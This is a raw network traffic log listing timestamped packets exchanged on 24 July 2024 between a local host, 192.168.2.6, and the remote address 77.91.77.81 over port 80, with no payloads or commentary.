                                                                                        Jul 24, 2024 07:14:27.498249054 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.498266935 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.499062061 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.499078989 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.499093056 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.499102116 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.499108076 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.499115944 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.499130011 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.499131918 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.499170065 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.499176025 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.499190092 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.499202967 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.499206066 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.499212980 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.499219894 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.499233007 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.499249935 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.499259949 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.499874115 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.499917984 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.507481098 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.507536888 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.507555962 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.507570982 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.507606030 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.507939100 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.507953882 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.507968903 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.507983923 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.507989883 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.508014917 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.508037090 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.518891096 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.518938065 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.519007921 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.519026041 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.519366026 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.519382000 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.519397974 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.519413948 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.519418955 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.519448042 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.519479990 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.519908905 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.519923925 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.519939899 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.519954920 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.519958973 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.519970894 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.519973040 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.520001888 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.520032883 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.520720959 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.520736933 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.520751953 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.520761967 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.520767927 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.520775080 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.520782948 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.520800114 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.520800114 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.520812035 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.520823956 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.520838022 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.521689892 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.521706104 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.521725893 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.521733999 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.521748066 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.521754980 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.521764040 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.521765947 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.521780014 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.521785021 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.521804094 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.521826029 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.522433996 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.522449970 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.522465944 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.522481918 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.522490025 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.522496939 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.522497892 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.522535086 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.523345947 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.523361921 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.523375034 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.523391008 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.523397923 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.523406982 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.523418903 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.523422003 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.523443937 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.523461103 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.524183989 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.524218082 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.524231911 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.524250984 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.524256945 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.524282932 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.524293900 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.524316072 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.524327993 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.524349928 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.524388075 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.524389029 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.524992943 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.525027037 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.525054932 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.525075912 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.525087118 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.525110006 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.525120974 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.525142908 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.525187969 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.525770903 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.525814056 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.525914907 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.525948048 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.526020050 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.526225090 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.526257992 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.526287079 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.526290894 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.526308060 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.526324034 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.526367903 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.526596069 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.526640892 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.584124088 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.584161997 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.584194899 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.584392071 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.584423065 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.584455967 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.584523916 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.585077047 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.585108042 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.585139990 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.585165977 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.585172892 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.585206032 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.585211992 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.585226059 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.585258961 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.585916042 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.585948944 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.585983038 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.586014986 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.586045980 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.586077929 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.586673021 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.586709023 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.588428020 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.588633060 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.588666916 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.588794947 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.588964939 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.589287043 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.589319944 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.589350939 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.589376926 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.589385033 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.589404106 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.589427948 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.590452909 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.590485096 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.590519905 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.590522051 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.590543985 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.590550900 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.590584993 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.590591908 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.590622902 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.591489077 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.591521978 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.591552973 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.591561079 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.591571093 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.591586113 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.591592073 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.591619015 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.591629982 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.591651917 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.591717005 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.592109919 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.592144966 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.592176914 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.592206001 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.592211008 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.592226028 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.592242956 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.592251062 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.592497110 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.592549086 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.592554092 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.592582941 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.592628956 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.599551916 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.599652052 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.599689007 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.599720955 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.599751949 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.599917889 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.599951982 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.599986076 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.599998951 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.600332022 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.600383997 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.609239101 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.609307051 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.609309912 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.609353065 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.609428883 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.609445095 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.609474897 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.609502077 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.609755993 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.609771013 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.609786034 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.609807014 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.609826088 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.610220909 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.610236883 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.610277891 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.610562086 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.610577106 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.610591888 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.610606909 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.610618114 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.610626936 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.610631943 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.610658884 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.611413002 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.611428976 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.611443996 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.611458063 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.611465931 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.611473083 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.611483097 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.611490011 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.611500978 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.611531019 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.612462997 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.612488985 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.612519979 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.612521887 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.612535954 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.612546921 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.612550974 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.612560987 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.612577915 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.612592936 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.613250971 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.613267899 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.613282919 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.613295078 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.613297939 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.613306999 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.613312960 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.613327980 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.613331079 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.613343000 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.613358021 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.613374949 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.614082098 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.614116907 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.614129066 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.614149094 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.614152908 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.614182949 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.614200115 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.614214897 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.614223003 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.614413023 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.614947081 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.614980936 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.615004063 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.615014076 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.615032911 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.615047932 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.615056992 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.615082026 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.615096092 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.615114927 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.615164995 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.615847111 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.615880966 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.615915060 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.615936995 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.615947962 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.615966082 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.615983963 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.615995884 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.616027117 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.616476059 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.616545916 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.616580009 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.616596937 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.616612911 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.616628885 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.616647005 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.616657019 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.616681099 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.616693020 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.616715908 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.616722107 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.616758108 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.677268028 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.677346945 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.677380085 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.677407980 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.677442074 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.677748919 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.677783012 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.677815914 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.677829981 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.677850008 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.677897930 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.680782080 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.680816889 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.680849075 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.680866003 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.680881977 CEST804971877.91.77.81192.168.2.6
